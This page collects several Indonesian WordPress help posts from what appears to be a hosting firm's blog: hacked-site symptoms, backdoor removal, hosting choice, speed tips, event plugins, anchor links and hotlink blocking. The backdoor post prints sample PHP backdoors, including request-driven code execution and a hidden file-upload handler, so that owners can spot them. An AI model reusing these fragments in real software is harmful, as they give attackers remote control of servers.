19 May

Tanda – Tanda Website Anda Dibajak

Anda mendapatkan tanda – tanda aneh dengan website Anda? Apakah tiba – tiba pengunjung Anda turun? Ataukah Anda mendeteksi bahwa website Anda loadingnya lambat?

Ini beberapa diantara gejala yang menunjukkan website Anda dibajak.

Tanda – tanda yang biasa ada saat website kita kena bajak:

Trafik atau pengunjung turun secara tiba – tiba.

Ada memang trafik atau pengunjung yang turun drastis karena adanya algoritma Google yang baru. Algoritma baru memang pengaruhnya signifikan. Ada yang trafik naik jika dianggap bagus dan turun signifikan jika dianggap jelek.

Tetapi, ada juga malware yang yang memang meredirect atau mengarahkan trafik kita ke web para pembajak. Tujuannya jelas, mereka berusaha menjual produk mereka atau membuat impressi iklan tinggi.

Google, dilain pihak, jika menemukan ada malware atau virus pasti memperingatkan pengunjung website kita.

Siapapun yang mendapatkan peringatan pasti tidak jadi berkunjung ke website kita.

Adanya link atau tautan yang tidak aman di website.

Ada peretas yang membuat tambahan link ke website mereka jika mereka telah berhasil membuat “backdoor” ke website Anda.

Halaman muka website diganti.

Untuk para hacker pemula, mereka senang dengan kegiatan semacam “de-face” website wordpress milik para pemula juga.

Tanda – tandanya mudah, halaman depan web kita berubah sesuai identitas hacker bersangkutan. Hacker seperti ini, ada yang sebagian meminta uang supaya website dinormalkan kembali.

Tidak bisa login di halaman admin wordpress.

Seorang hacker biasanya juga mengubah akun login kita di halaman wordpress termasuk login name dan password.

Ada file aneh di server.

Jika Anda melihat script dan file asing di server, kemungkinan inilah virusnya. Bagi pengguna plugin keamanan Sucuri, Anda bisa melakukan scan unruk membersihkan file tersebut.

Sayangnya, hanya fitur premium saja yang menawarkan fasilitas pembersihan untuk web dan database kita.

Situs lambat dan bahkan sulit merespon.

Jika ada hacker yang mencoba menyerang dengan DDOS, maka situs kita bisa menjadi lambat. DDOS ini menyerang dengan mengirimkan banyak sekali permintaan kecil – kecil ke website kita. Permintaan ini bertujuan untuk membuat server kita down.

Jika ini yang terjadi kepada Anda, Anfda bisa menggunkan CDN untuk mengatasinya.

Ada Aktivitas tidak wajar di server logs.

Sesuai namanya, server logs mencatat semua error yang terjadi di website kita. Server logs juga mencatat IP address yang paling sering mengakses situs kita saat situs kita diserang.

manakah-server-log-di-server

Jadwal tugas otomatis yang mencurigakan.

Secara default, server web kita menyediakan layanan cron job yang bisa mengatus jadwal beberapa hal secara oyomatis. Kita bisa memposting di jadwal tertentu dan sebagainya. Jika ada jadwal aneh yang tidak kita seting sebelumnya, mungkin disebabkan karena ada hacker yang mengeksploitasi kerja cron job ini.

Ada pop up atau pop under di website kita.

Pop up atau pop under biasanya tidak tampil untuk pengunjung yang datang langsung ke web kita. Jadi, jika Anda mengetik langsung nama domain, maka iklan ini tidak akan kelihatan. Iklan hanya terlihat bagi pengunjung yang datang melalui mesin pencari.

Tidak bisa menerima serta mengirimkan email.

Salah satu tanda situs kita kena bajak adalah tidak mampu menerima email yang lewat host mail server. Pembajak, kemungkinan sudah menggunakan w-mail kita untuk mengirimkan email spam mereka.

Hasil pencarian dibajak.

Biasanya pembajak mengganti meta description website atau blog kita sesuai dengan yang mereka inginkan.

Sebagai kesimpulan, sangat penting bagi kita untuk memiliki backup data yang teratur untuk website kita. Jika kita memilikinya, kita tinggal hapus saja web atau blog kita dan instal ulang semuanya kembali. Jika tidak ada, kita terpaksa menupload konten kita satu persatu kembali jika website s kita hapus.

Jika backup konten juga tidak ada sedangkan konten sudah banyak, yah, terpaksa Anda menyewa ahli untuk membersihkan situs Anda.

5/5 (1)

Please rate this

Share this
19 May

Bagaimana Cara Menghilangkan Backdoor di WordPress

Bagaimana cara menghilangkan backdoor di web atau blog wordpress? Backdoor barangkali bisa kita ibaratkan sebagai pintu belakang. Tetapi, bagi sebuah web wordpress, backdoor atau pintu belakang ini diinstal atau dipasang bukan oleh pemilik rumah. Untuk sebuah bangunan, sulit memasang sebuah pintu tambahan tanpa sepengetahuan pemilik. Tetapi di wordpress, memangan pintu belakang sendiri di website orang dimungkinkan. Semuanya terjadi karena kita jarang mengetahui tentang pemrograman untuk backdoor ini.

Fungsi backdoor ini bisa disetarakan juga dengan fungsi pintu belakang untuk sebuah rumah. Supaya pembuat pintu bisa keluar masuk secara leluasa.

Bagi seorang hacker, backdoor bisa digunakan untuk memperoleh manfaat dari web bersangkutan. Hacker bisa mencuri data atau memasang berbagai malware lain lagi sesuai kepentingannya.

Bagaimana cara mengetahui situs wordpress kita terinfeksi backdoor dan menemukannya?

Backdoor biasanya sulit ditemukan karena biasanya code programnya disamarkan. Meskipun seringkali backdoor berupa kesengajaan dari hacker, terkadang ada juga backdoor yang berupa script maintenance yang tertinggal saat digunakan.

Backdoor bisa ditambahkan melalui plugin atau theme ataupun dengan cara lain.

Jika login kun kita bisa diterobos, maka hacker bisa memasang backdoor dalam bentuk plugin atau theme.

Plugin atau theme ini bisa berbentuk plugin atau theme yang tidak aktif yang berada di sudut halaman theme atau plugin.

Kemungkinan besar, plugin dan theme ini tidak tampak di halaman adminitrative di wordpress. Kita hanya bisa melihatnya melalui file manager atau FTP.

Biasanya juga, backdoor ini diberi nama dengan nama yang tampak berguna seperti:

wordpress support

wp-SEO

atau yang lainnya lagi. Intinya, membuat kita melihatnya sebagai file bermanfaat.

Jika ada file theme atau plugin yang tidak dikenal, atau tidak pernah kita instal, silahkan dihapus saja.

Atau, hapus saja plugin semua dan instal ulang sekalian.

Script untuk backdoor diasanya ditemukan di code / kode Php di web server yang bersangkutan. Code ini ini bisa dimasukan melalui plugin, theme ataupun berupa file standalone.

File yang semacam ini biasanya sangat sulit dicari. Apalagi bila backdoor tidak aktif.

Untuk file backdoor di .htaccess, atau Anda mencurigainya ada disana, silahkan dihapus saja file .htaccess ini. WordPress akan membuat ulang secara otomatis. Tetapi andaikata tidak dibuat ulang, silahkan buka Admin > Setting > Permalink dan klik save.

File .htaccess baru telah dibuat kembali.

Jika script backdoor ada di wp-config.php.

Silahkan bandingkan file wp-config dengan file wp-config-ample.php. Jika ada kode tambahan, silahkan dibuang saja kode tambahannya.

Bagi yang kurang memahami pemrograman, Kita bisa menggunakan plugin “Exploit Scanner atau plugin keamanan “Sucuri” versi berbayar. Aktifkan plugin dan scan.

Bagusnya, plugin ini menscan banyak tempat sekaligus.  Hacker pasti meletakkan script di berbagai tempat.

Beberapa contoh script backdoor:

Anda bisa melihat beberapa code backdoor yang biasa digunakan. Jika Anda menemukan yang semacam ini, silahkan dicurigai.

$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<=DqV@&(BjX'~|ge%p+oMJv^);\"k9";$GLOBALS['ofmhl60'] = ${$t43[20].$t43

atau

if (isset($_REQUEST['FILE'])){
$_FILE =$_REQUEST['92422e6d']('$_',$_REQUEST['FILE'].'($_);');
$_FILE(stripslashes($_REQUEST['HOST']));
}

Atau yang seperti ini:

@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000');
$size=$_POST['size'];
$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name'];
$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp);

Script maintenance yang tertinggal tidak dihapus bisa mengijinkan akses ke website secara langsung. Salah satu cointoh file yang terkenal adalah searchreplacedb2.php. Jika tertinggal file ini mengijinkan akses secara langsung ke database wordpress.

Inilah sedikit cara bagaimana menghilangkan backdoor di wordpress, silahkan dicoba. semoga berhasil.

5/5 (1)

Please rate this

Share this
19 May

Tips Bagaimana Cara Memilih Server Hosting yang Baik dan Handal

Bagi Anda yang ingin mengonlinkan bisnis dan ingin memiliki website, biasanya ada pertanyaan mengenai server hosting. Setelah beberapa kali browsing di internet ada diantara kita justru menjadi ragu – ragu. Semua provider hosting mengatakan hostingnya bagus dan handal. Anda layak mempercayai mereka dan bukan orang lain.

Langsung saja, bagi Anda yang ragu – ragu,

Cara memilih hosting yang baik dan handal:

  • Gunakan layanan server hosting yang memberikan garansi.

Ini adalah cara paling gampang untuk mencari layanan hosting yang handal.

Tidak ada sistem yang stabil 100%. Sebenarnya, sistem yang stabil 99% pun sangat jarang. Jadi, gunakan saja garansi.

  • Melihat review dan bertanya di forum.

Apabila banyak komplain, bisa dipastikan layanan mereka memang kurang baik atau tidak konsisten.

Bertanya di forum memang bagus meskipun jawabannya bisa bermacam – macam. Tetapi, yang menjadi pegangan Anda, Jangan memilih server hosting yang terlalu banyak mendapatkan komplain dari pelanggan.

Komplin barangkali biasa untuk layanan apapun. Kita juga sering membaca komplain tentang layanan bank, jasa pengiriman dan logistik serta hotel dan sebagainya.

Yang penting, apabila klien mereka cukup banyak yang mengeluh, hal yang sama bisa terjadi kepada Anda.

  • Backup data teratur.

Jika penyedia server menyatakan bahwa data Anda dibackup secara teratur, silahkan dijadikan sebagai pegangan dalam membeli server.

Tetapi, jangan dijadikan pegangan dalam operasional website Anda.

Anda tetap harus membackup data Anda sendiri. Selain itu, ada penyedia server yang ternyata tidak melakukan pekerjaan rumah mereka. Hasilnya, Anda bisa kerepotan.

Bagaimanapun, kita tidak bisa benar – benar tahu apakah data kita benar – benar telah dibackup secara teratur.

Akhirnya, review pelanggan kembali menjadi panduan kita untuk memilih server.

  • Dukungan teknis 24 jam.

Bagian ini penting, jadi jika ada masalah website kita akan segera online dan lancar kembali.

Bagi kami di Lawang Techno, kami menggunakan server yang sama dengan yang Anda gunakan. Artinya apabila Anda mendaopat masalah, kami juga mendapat masalah yang sama.

Selain itu, kami membackup semua data di server kami secara teratur dan sering.

Cara bekerja kami, kami lebih nyaman untuk memindahkan web Anda ke server lain apabila server Anda bermasalah. Jadi kami bisa membereskan server bermasalah tanpa terbebani komplain pelanggan.

Sekarang, beberapa aspek teknis yang kita pertimbangkan saat menyewa server.

  • Kapasitas disk space.

Kapasitas harddisk merupakan salah satu yang penting untuk dipertimbangkan. Kita tidak bisa mengembangkan website kita jika kapasitas terlalu kecil. Untuk yang ingin menggunakan wordpress, silahkan Anda alokasikan sekitar 80 MB untuk file WordPress beserta plugin dan theme yang ingin Anda gunakan.

  • Bandwith server.

Banyak pengunjung yang bisa berkunjung ke website kita tergantung besar bandwith server kita. Katakan saja, 1 halaman web kita besarnya 1 MB, maka dengan bandwith 2GB sebulan, kita bisa mendapatkan maksimal 2000 pengunjung.

Angka ini tidak pasti karena kunjungan kita sendiri juga akan menggunakan bandwith jatah server kita. Jumlah pengunjung bisa jadi kurang dari 2000 orang perbulan.

Bagaimana dengan mereka yang menawarkan bandwith unlimited?

Pada dasarnya, tidak ada bandwith unlimited. Jika pengunjung Anda sudah dianggap terlalu banyak, maka biasanya website Anda akan di suspend juga dan diminta untuk upgrade server.

  • Jumlah Add On Domain.

Apabila Anda berniat membuat website baru dan memerlukan domain baru, apakah Anda bisa menambah domain baru di server yang ada sekarang?

Paket server termurah biasanya tidak menyediakan fasilitas ini. Dan, ketiadaan fasilitas ini bukan selalu berarti jelek.

Jika server dengan harga 200 ribu setahun kita pasang 3 domain, maka justru kita yang tidak akan mendapat apa – apa karena jumlah pengunjung sedikit.

  • Harga server.

Silahkan membandingkan harga server dengan penyedia server lainnya. Tahun 2018 ini, secara umum harga server yang ditawarkan sebenarnya mirip. Tidak ada yang terlalu mahal atau terlalu murah saat ini terutama untuk server pemula. Yang agak berbeda barangkali ada di harga server untuk VPS (Virtual Private Server) atau Dedicated Server (DS).

Jika spesifikasi teknis server tinggi, biasanya harganya lebih mahal daripada yang spesifikasinya standar.

Untuk server shared, sangat jarang kita bisa melihat spesifikasi server yang ditawarkan oleh penyedia hosting. Mereka bisa memindahkan data web Anda kapan saja untuk maintenance dan sebagainya.

Yang penting, bandwith dan disk space masih sama dengan yang ditawarkan. Untuk kecepatan, silahkan Anda test kecepatan situs Anda secara teratur di pingdom.com

Tetapi, mohon diingat, kecepatan website dengan 5 konten berbeda dibandingkan website berkonten 1000 jika ditempatkan pada server yang sama.

  • Mendukung Cpanel atau Softaculous.

Dukungan ini penting bagi Anda yang ingin menggunakan wordpress tanpa perlu mengetahui pemrograman dan jaringan. Anda bisa menggunakan wordpress dengan klik – dan klik saja.

  • Lokasi server.

Sebenarnya lokasi server penting. Secara teori, lokasi pengunjung di Indonesia lebih cepat mengakses website dari server Indonesia juga.

Masalahnya, server di Indonesia belum tentu lebih stabil dari server USA. Kemudian, Anda juga tidak tahu apabila server shared Anda digunakan untuk 300 website? Ya, akhirnya yang cepat menjadi lambat juga kan.

Bagi kami, terus terang lebih mudah menggunakan server USA yang secara umum lebih stabil. Kami lebih jarang maintenance server dan di komplain pelanggan. Soal kecepatan, server ini juga kami gunakan, jadi kami yakin kok kalau server ini handal.

Inilah beberapa tips memilih server yang handal bagi Anda. Semoga bermanfaat.

Sampai jumpa…

5/5 (1)

Please rate this

Share this
18 May

Bagaimana Cara Mempercepat Website (WordPress) Anda

Website yang lambat sekarang mulai ditinggalkan. 1 dari 4 orang bahkan memilih meninggalkan website yang lambat. Yang lain, lebih suka untuk tidak membuka ahalaman berikutnya.

Jika website kita lambat, kerugiannya besar bagi kita.

Amazon, pada tahun 2006 melaporkan: jika situs mereka lebih cepat 0,1 detik, pendapatan mereka meningkat 1%. Selain itu, jika website mereka melembat bahkan hanya 1 detik saja. pendapatan mereka bisa berkurang 1,6 milyar US Dolar setahun.

Pada tahun 2010, Google sebagai mesin pencari terbesar mulai menggunakan kecepatan website sebagai faktor untuk memberikan rangking di halaman hasil pencariannya. Website yang lambat akan memperoleh rangking lebih rendah daripada website yang cepat.

Apa yang terjadi jika kelambatan website kita terjadi hanya 1 detik saja?

Menurut penelitian, konversi atau penjualan kita bisa menurun hingga 7%. Jumlah penurunan yang dahsyat untuk kelambatan 1 detik saja.

Selain itu, pageview kita berkurang hingga 11% dan kepuasan pelanggan kita berkurang sangat banyak, 16%.

Ini semua adalah kerugian yang kita terima apabila website kita menjadi lambat.

Ada penelitian yang menyatakan: 47% pengunjung berharap wesite kita terbuka kurang dari 2 detik. 57% pengunjung tidak berharap web kita terbuka lebih dari 3 detik. Mereka akan meninggalkan website yang termuat lebih dari 3 detik.

Tidak ada alasan lain, kita harus mengikuti keinginan pengunjung kita.

Seiring penggunaan dan penambahan posting, website akan melambat. Gambar yang semakin banyak membuat loading web kita semakin besar. Jika perlu ditambahkan, database wordpress kita juga pasti dipenuhi banyak hal yang tidak penting.

Ada beberapa cara untuk meningkatkan performa website kita secara keseluruhan. Langkah – langkah ini mudah dilakukan dan bisa dilakukan oleh pemula.

  • Bersihkan plugin yang tidak penting.

Gunakan plugin yang kita perlukan saja.

Plugin yang jelek dapat memperlambat kinerja website wordpress kita. 5 plugin jelek bisa membuat web kita lebih lambat daripada 10 plugin bagus.

Sayangnya, ada plugin yang sangat terkenal, memiliki fungsi bagus tetapi sekaligus sangat memperlambat web / blog wordpress Anda. Kami tentunya tidak bisa menyebutkan yang mana saja.

Secara umum, plugin bisa mempengaruhi hingga 80% kecepatan website. Sangat signifikan.

Untuk mengetahui plugin mana yang membebani kinerja website kita, Anda bisa menginstal plugin Plugin Performance Profiler.

Yah, instal 1 lagi untuk tahu semuanya.

Jika ternyata Anda menggunakan salah satu plugin populer yang lambat itu, Anda juga akan segera mengetahuinya sendiri.

Optimasi gambar Anda.

Ada cara untuk mengoptimasi gambar yang baik. tanpa kelihatan secara visual perbedaannya.

Kita bisa menggunakan WP Smush. Plugin ini digunakan dengan 1 kali klik yang mudah.

Kecilkan ukuran gambar kita.

Masuk ke GTmetrix.com dan masukkan url kita. Ikuti petunjuk disana untuk optimisasi gambar yang ada.

Gunakan caching halaman.

Cahe halaman berguna untuk membuat “copy” halaman yang pernah kita kunjungi. Jadi, ketika pengunjung berkunjung kembali, “copy halaman” inilah yang ditampilkan. Web kita tidak perlu me-load dari awal.

Beberapa rekomendasi kami:

  • W3 Total Cache – gratis
  • WP Super Cache – gratis
  • WP Rocket – berbayar tetapi memang lebih baik.

Gunakan Content Delivery Network atau CDN.

Matthew Woodward menemukan bahwa CDN bisa mempercepat website hingga 60%.

Data website kita tidak disimpan hanya pada 1 server seperti server biasa. Data kita disimpan dalam server dalam suatu jaringan golbal dan ditampilkan kepada pengunjung dari lokasi server yang paling dekat dengan pengunjung.

Bagi pengunjung di Jerman, mereka dilayani oleh server di Jerman bukan oleh server di Amerika. Dengan cara ini, kecepatan website kita meningkat pesat.

Untuk pilihan CDN, ada beberapa rekomendasi:

  • CloudFlare – ada pilihan gratis yang sudah mencukupi untuk keperluan website toko online biasa.
  • Max CDN – saat ini masih yang terbaik tetapi ada biaya bagi Anda yang ingin menggunakan CDN di area Singapura.
  • Stackpath

Gunakan hosting yang cepat.

Point ini penting. Performa hosting kita tentunya sangat berpengaruh kepada performa website kita.

Lawangtechno menggunakan hanya website USA yang kencang dan stabil. Kami menggunakan server yang sama dengan yang digunakan klien kami. Jadi, kami tidak ingin ribet atau menggunakan server yang lambat juga.

Bersihkan dan optimasi database Anda.

Database kita akan dipenuhi smapah juga. Akan banyak hal yang bisa membuak databse tidak optimal. Untuk mengatasinya, gunakan berbagai plugin untuk mengoptimasi database kita. Salah satu plugin untuk optimasi database ini adalah  plugin WP-Optimize.

Gunakan template yang cepat.

Sebenarnya, theme yang baik bisa kita lihat antara lain dari kecepatan eksekusi code Php nya. Tetapi, proses ini cukup ribet bagi pemula. Jadi, kita test saja kecepatan website kita menggunakan Pingdom saat digunakan dengan theme berbeda.

Yang harus diingat, theme profesional yang terkenal belum tentu lebih cepat daripada theme gratis.

Gunakan Gzip Compression.

Zip seperti kita ketahui adalah sarana untuk kompresi file. Kita bisa mengaktifkan fitur ini di website kita.

Sebelumnya, test terlebih dahulu web kita dengan gziptest.com. Jika sudah mendukung, ya tidak perlu lagi.

Untuk Anda yang menggunakan server Apache, Anda tinggal menambahkan code berikut ini kedalam file .htaccess Anda.

<IfModule mod_deflate.c>
# Compress HTML, CSS, JavaScript, Text, XML and fonts
AddOutputFilterByType DEFLATE application/javascript
AddOutputFilterByType DEFLATE application/rss+xml
AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
AddOutputFilterByType DEFLATE application/x-font
AddOutputFilterByType DEFLATE application/x-font-opentype
AddOutputFilterByType DEFLATE application/x-font-otf
AddOutputFilterByType DEFLATE application/x-font-truetype
AddOutputFilterByType DEFLATE application/x-font-ttf
AddOutputFilterByType DEFLATE application/x-javascript
AddOutputFilterByType DEFLATE application/xhtml+xml
AddOutputFilterByType DEFLATE application/xml
AddOutputFilterByType DEFLATE font/opentype
AddOutputFilterByType DEFLATE font/otf
AddOutputFilterByType DEFLATE font/ttf
AddOutputFilterByType DEFLATE image/svg+xml
AddOutputFilterByType DEFLATE image/x-icon
AddOutputFilterByType DEFLATE text/css
AddOutputFilterByType DEFLATE text/html
AddOutputFilterByType DEFLATE text/javascript
AddOutputFilterByType DEFLATE text/plain
AddOutputFilterByType DEFLATE text/xml
# Remove browser bugs (only needed for really old browsers)
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4.0[678] no-gzip
BrowserMatch bMSIE !no-gzip !gzip-only-text/html
Header append Vary User-Agent
</IfModule>

Non aktifkan hotlink ke website Anda.

Hotlink adalah proses untuk menampilkan gambar di web atau blog Anda di website lain dengan menyambungkan link secara langsung. Jadi, gambar di website Anda tampil untuk web lain meskipun bandwith dan server yang menampilkannya milik Anda.

Kejadian ini memperberat beban server dan menghabiskan bandwith kita.

Untuk mengilangkannya, Anda bisa mengikuti panduan menghilangkan hotlinking di wordpress disini.

Inilah beberapa tips yang bisa kita lakukan untuk meningkatkan kecepatan website kita. Web yang cepat memungkinkan kita mendapatkan pengunjung dan penjualan lebih banyak.

5/5 (1)

Please rate this

Share this
18 May

Daftar Plugin WordPress Terbaik bagi Website Manajemen Event / Acara

Inilah daftaer untuk plugin wordpress terbaik bagi website evebt dan manajemen acara. Jika Anda hanya sekedar menginstal plugin kalender, maka plugin tersebut bukanlah plugin yang Anda harapkan untuk sebuah website manajemen. Tools yang ada tidak lengkap dan kurang dari yang kita butuhkan.

Sekarang, kita mencari plugin management event wordpress yang mampu menangani berbagai fungsi. Kita ingin menjual tiket, Booking tamu VIP dan menajemen tamu, pengiriman notifikasi e-mail secara otomatis dan sebagainya.

Plugin seperti ini jelas berbeda dibandingkan plugin kalender biasa. Untuk rekomendasi, kami memiliki daftarnya untuk Anda.

Events Manager

Plugin ini tersedia dalam versi gratis dan berbayar. Versi gratisnya sudah mencukupi untuk keperluan harian kita. Pengunjung bisa melakukan registrasi dengan versi gratis. Jika ingin menerima pembayaran langsung dengan Paypal, silahkan gunakan versi berbayar.

Untuk keperluan menjual tiket di Indonesia, secara umum kita belum terlalu membutuhkan Paypal. Kita juga biasa menerima pembayaran melalui rekening bank. Pembayaran melalui bank lebih nyaman dan lebih dipercaya konsumen Indonesia.

Plugin ini adalah salah satu yang terbaik yang ada. Fasilitasnya (versi premium) menyediakan fitur lengkap untuk membuat dan mengelola event secara lengkap.

  • Terdapat fitur untuk booking harian atau beberapa hari sesuai jadwal event yang ada.
  • Event kita bisa di-share di media sosial dengan plugin BuddyPress.
  • Pengunjung web bisa men-share event mereka sendiri.
  • Sangat mengandalkan Google Map untuk menampilkan lokasi event. Sekarang, fitur ini sangat dicari pengunjung kita.

Dan sebagainya.

WP Event Manager

Ini adalah plugin yang “ringan” tanpa membebani backend. Fitur lumayang lengkap untuk mengelola event dan costumer supportnya adalah salah satu yang terbaik.

Plugin ini tampaknya memang diciptakan untuk kecepatan tinggi. Sistem cachenya bagus dan daftar eventnya menggunakan AJAX. Selain itu, seluruh area kalendernya juga diberi sentuhan AJAX yang menjadikannya sangat halus saat browsing.

Event Organiser

Plugin ini menggunakan custom post yang dilengkapi beberapa module tambahan. Tetapi, kita tetap memperoleh post standar wordpress kita kapanpun kita membutuhkannya.

Plugin ini tersedia gratis dan berbayar. Yang berbayar menambahkan berbagai add-ons yang harganya tergantung dari kelengkapannya.

All-in-One Event Calendar

Tersedia dal;am versi gratis. Tetapi Anda bisa menambah fitur yang berbayar.

Fitur gratisnya lumayan lengkap dengan kemampuan menangani event yang berulang, Google Map dan berbagai filter.

Selain itu, fitur standarnya sangat mudah digunakan untuk mengipor / ekspor data dari Google Calendar, MS Outlook dan juga Apple iCal.

Event Espresso 4 Decaf

Plugin ini versi gratisnya sudah menyediakan fitur pemesanan tiket, regristrasi serta pembayaran melalui Paypal. Ini barangkali yang membedakannya dari plugin event manajemen lainnya. Selain itu, kita mengaprove email secara otomatis sekaligus bisa mengirimkan e-mail atau link terkait dengan event kita.

Bagi pengguna smartphone, terdapat fitur untuk menscan tiket dan melacak siapa yang hadir di event kita.

Untuk versi berbayar, Harganya bisa mencapai hampir 300 US dolar. Dengan harga ini kita mendapatkan 60 add-ons. Tetapi, biasanya kita tidak membutuhkan semua add-ons. Jika hanya perlu 1 macam dengan semua fitur pendukungnya, harganya jauh lebih murah. Dibawah 80 US Dolar.

The Events Calendar

Plugin ini diciptakan bagi mereka yang sibuk. Event Anda akan muncul di internet dalam hitungan menit. Tetapi Venue dan organiser lainnya bisa menyusul kemudian.

Untuk forntend, tampilan untuk event kita cukup banyak mulai dari tampilan daftar hingga tampilan kalender.

My Calendar

Plugin free ini lebih banyak berfungsi sebagai kalender daripada plugin menajemen event.

Jika mau, kita bisa menambahkan plugin tiket online free seperti My Tickets plugin yang memungkinkan kita menjual tiket secara online. Sekurangnya, nanti pembayaran bisa kita terima melalui bank.

Plugin menajemen event yang baik sangat membantu kita dalam mensukseskan event yang ada. Pengunjung dapat memesan tiket secara online bahkan saat dini hari. Selain itu, kita bisa menerima atau menolak pesanan berdasarkan ketersediaan tempat.

Dari berbagai plugin ini, mungkin kita jarang menggunakan yang memiliki fitur pembvayaran secara online.

Untuk menerima pembayaran secara online, yang kita perlukan sebenarnya adalah website yang benar – benar secure.

5/5 (1)

Please rate this

Share this
18 May

Bagaimana Cara Membuat Lompatan di Halaman Post atau Page WordPress

Bagaimana membuat lompatan di halaman posting atau page wordpress?  Cara membuat lompatan di halaman ini tidak begitu sulit sebenarnya. Caranya adalah dengan membuat link seperti biasa.

Membuat link tidak terbatas hanya untuk antar halaman website saja. Kita bisa membuat link untuk banyak bagian di halaman posting atau page wordpress kita.

Lompatan di halaman ini berguna jika kita memiliki posting atau page dengan artikel yang panjang yang kita bagi dalam beberapa bagian.

Salah satu contohnya ada dibawah ini:

Ini target kata 1, mestinya terlihat diatas.

Test target kata ini kita buat untuk mengetes link di bawah. Jadi mohon maaf kalau tidak nyambung dengan artikel sebelumnya.

Anda juga bisa menggunakan lompatan halaman ini apabila memiliki posting dengan daftar yang cukup panjang. Setiap memerlukan satu bagian dari daftar yang ada, kita bisa mereferensikan semua kembali dengan memberikan link ke bagian halaman bersangkutan.

Anda juga ingin pengunjung Anda mengingat banyak istilah yang Anda gunakan. Setiap istilah memiliki definisi sendiri yang dijelaskan dalam setiap bagian. Nah, kita ingin mereka mengingat kembali apa yang sudah mereka baca jika pengunjung kita memerlukannya.

Cara membuat lompatan di halaman posting.

Membuat target lompatan

Membuat link atau tautan

Target lompatan kita buat sendiri karena lompatan ini terjadi di dalam satu halaman saja. Kita tidak memiliki alamat untuk target tautan jadi kita buat sendiri alamat target tautan kita.

Yang pertama, kita harus masuk dalam mode “text” di posting atau page. Jangan menggunakan mode visual.

Kita membuat link ke bagian atas (Top) halaman:

Cara termudah, copy paste code ini dalam mode text.

<a href=”#top”>top</a>

Jika kita menginginkan bagian lain, maka code bisa kita modifikasi.

Kita mulai dengan membuat target kita.

<a id=”objek-target”>ini target tulisan kita.</a>

kemudian, setelah membuat target, kita bisa membuat link menuju ke target:

<a href=”#objek-target”>klik untuk menuju target tulisan kita.</a>

Jika Anda perlu contonnya, ini link yang menuju target kita

menuju ke target kata 1!

Membuat lompatan halaman ini sejatinya tidak sulit dilakukan. Kita hanya perlu memodifikasi beberapa link seperti yang kita sebutkan diatas.

Bagi yang masih bingung, silahkan untuk kembali ke awal posting atau klik disini.

5/5 (1)

Please rate this

Share this
18 May

Bagaimana Cara Menghentikan Hotlinking ke Website / Blog WordPress

Hotlinking adalah menggunakan link gambar di suatu website untuk digunakan di website kita. Dengan cara menggunakan link secara langsung, website kita bisa memiliki gambar yang sama dengan web sumber gambar. Tetapi, karena gambar tadi diambil langsung dari web lain, maka web lain tadi yang membayar bandwith yang digunakan.

Apabila terjadi kepada kita, maka kitalah yang membayar bandwith tersebut, dan yang lainnya lagi.

Hotlinking gambar bisa menjadi illegal jika gambar yang ada mempunyai hak cipta. Hotlink gambar mobil langsung dari website pabrik mobil bersangkutan membuat mereka menuntut kita ribuan dolar untuk 1 gambar.

Hotlink akan membuat server kita kehabisan sumberdaya. Jika gambar dari web kita digunakan oleh web bertrafik sangat tinggi. Kemudian gambar tadi dilihat oleh ribuan orang, maka server kita harus melayani ribuan pengunjung untuk melihat gambar kita tanpa mereka pernah berkunjung langsung ke web kita.

Server kita tetap mendapatkan beban besar tanpa memperoleh nilai tambah.

Hotlink yang dilakukan menggunakan software lebih ribet lagi dampaknya. Mereka mendapatkan ribuan gambar secara otomatis tanpa membebani server mereka, baik untuk bandwith maupun space atau tempat penyimpanan hardisk mereka.

Adakah yang melakukannya?

Banyak sih sebenarnya. Meskipun web yang menggunakan hotlink akan di banned oleh Google pada akhirnya. Tetapi praktek ini bisa cukup merugikan saat praktek ini sedang berjalan.

Hotlink tidak mempengaruhi SEO website “korban” tetapi membebani sumber daya yang ada.

Hotlink dilakukan sebagian karena pemilik website malas untuk membuat link gambar dengan benar.

Mereka hanya ingin cepat dan copy paste link yang ada.

Sebagian lagi sih, memang sengaja melakukannya dari awal untuk mengurangi beban website mereka.

Jadi, hotlink harus kita hindarkan dari website kita.

Jangan biarkan gambar kita di -hotlink karena membebani resource kita. Sebaliknya, jangan melakukan hotlink juga ke web lain karena web atau blog kita pasti akan kena banned dari indeks Google.

Cara menghindari hotlink di blog / website wordpress kita

Yang paling mudah, gunakan CDN

Atau yang kita kenal sebagai Cloudflare atau KeyCDN untuk versi gratis

Cloudflare yang gratis ini memberikan seting untuk proteksi hotlink yang baik  Jadi, gratis dan kualitas yang baik. Apalagi?

Ya kita gunakan saja.

Awalnya, kita menggunakan cloudflare untuk mempercepat website atau blog kita. Sekarang, kita tambahkan juga proteksi hotlink.

Seting mereka sangat bagus sehingga boot Google dan yang lainnya tidak perlu ikut terblokir juga.

Dengan cara ini, kita juga tidak perlu merubah apapun di wordpress kita.

Menggunakan plugin “Prevent Content Theft” atau yang sejenisnya

Menggunakan plugin merupakan cara yang mudah untuk memprotekdi gambar dari hotlink. Kita tinggal instal dan aktifkn plugin tersebut.

Cara yang digunakan plugin ini adalah dengan mematikan fungsi “right click” pada mouse pengunjung. Jika kita terapkan, maka semua konten kita akan terproteksi juga.

Melindungi hotlink melalui Apache

Apabila web server Anda menggunakan Apache, tambahkan code berikut di file .htaccess Anda, atau buat sendiri.

RewriteEngine on 
RewriteCond %{HTTP_REFERER} !^$ 
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?namdomainkita.com [NC] 
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?google.com [NC] 
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?bing.com [NC] 
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?yahoo.com [NC] 
RewriteRule \.(jpg|jpeg|png|gif|svg)$ http://dropbox.com/hotlink-placeholder.jpg [NC,R,L].

